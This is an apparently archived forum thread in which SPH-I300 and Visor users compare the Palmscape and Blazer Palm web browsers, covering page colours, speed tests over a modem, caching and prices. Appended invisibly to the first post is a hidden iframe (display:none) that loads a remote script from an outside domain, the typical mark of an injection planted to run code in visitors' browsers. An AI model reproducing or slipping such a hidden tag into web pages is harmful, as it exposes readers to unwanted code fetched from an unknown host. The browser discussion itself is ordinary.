SPH-I300 Forum is blue!?

When I browse this forum from my I300 with Palmscape all the pages are a dark blue with black text that is really hard to read. I was using Blazer, but it caused a soft reset a couple times so I went back to Palmscape. I think Blazer had the same problem with blue pages though. Anyone else notice this? If a moderator can change this it would be great.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I agree. The site works very well on Blazer for me. Do you have 2.0 installed?

So I installed Blazer (again) & tried it for a couple days. I first used Blazer at the earliest beta before Handspring bought it. It's slow to load, hangs up in the middle of loading a page, & doesn't show all the pictures on a page quite often. It also loses the connection to the proxy server every few pages. I deleted it & went back to Palmscape. Blazer still acts too much like beta software for me.

Not only 2.0, but 2.0 for the I300. I had the Handspring 2.0 on it first which crashed pretty badly. It didn't have the goofy little browser app to point to Blazer. Very funny about the porno. Seriously though, who would wait long enough for the photos to come up? Palmscape brings them up faster anyway. I have a feeling the Blazer proxy server is overstressed a bit.

Any idea how much faster? Would you mind timing? I've been viewing the MLS on my I300 and would consider palmscape were it that much quicker.

I'll set it up later this afternoon when I get a chance. My gut feeling is that they are probably about the same for text, but a full page with pictures will be twice as fast or more with Palmscape. Palmscape doesn't handle wrapped text as well on some pages, & gifs will sometimes be too small to read. This isn't a problem on pages I'm already familiar with. Some gifs & links don't show up at all with Blazer. I was on everybodylovesray.com last night, & several links didn't show up in Blazer.

What is the MLS you are viewing? I'm running some tests now. I'll probably hook up my Prism to a landline modem & test that too with Blazer & Palmscape. I've noticed a couple other new browsers lately, but I haven't tried any of them. I bought several last year when the VisorPhone came out & tried them all. Palmscape was the best IMHO then.

I just signed up for mobile-realty. It grants me access to the multiple listing service, which services realtors. MLS of Northern Illinois.

Okay. I'm done testing. I tested an I300 with full signal strength & a Visor Prism with a Thinmodem. I'm in a rural area that only has 33.6 access. I'm pretty surprised at the results. You can see that Palmscape is faster in most of the tests except text only on the I300.

looks good on paper.

remember, once you go back to a site you have previously been to, it shuld load much faster on the blazer as that site should be in the cache...

rememebr, blazer goes thru a proxy so that the image will be "formatted" properly on the i300's screen. no need to scroll left to right..

Palmscape stores it in the cache as well. Palmscape also returns to the place you were on the previous page when you hit "back". There's no scrolling left & right in Palmscape either. Pocket PC in particular drives me crazy with that. Read my review of the Pocket PC from last year at the-gadgeteer. I just think the proxy server is a little slow at peak times for Blazer. Blazer also has some issues for me with being sluggish to navigate & exit. The ability to save the page to a memo in Palmscape is the clincher for me. I do that all the time. I know it sounds like I'm selling for Palmscape (whom I have no affiliation with whatsoever - I think it's a Japanese developer?) I'm just tired of the hype around Blazer when I don't care for it personally. People should know there are some alternatives.

well its good that you are keeping us informed.

how much is palmscape?

blazer is a wonderful browser and 2.0 has certainly stepped up where the previous version left off.

sure there are others (the sprints WAP, eudora, avantgo...) we knew that , and i knew about palmscape, but i have had blazer for a while and it has done well buy me..

To each his own. That's what makes the platform strong.

Palmscape costs $30. Blazer costs $20. Glad we got it free the I300 & the VisorPhone.
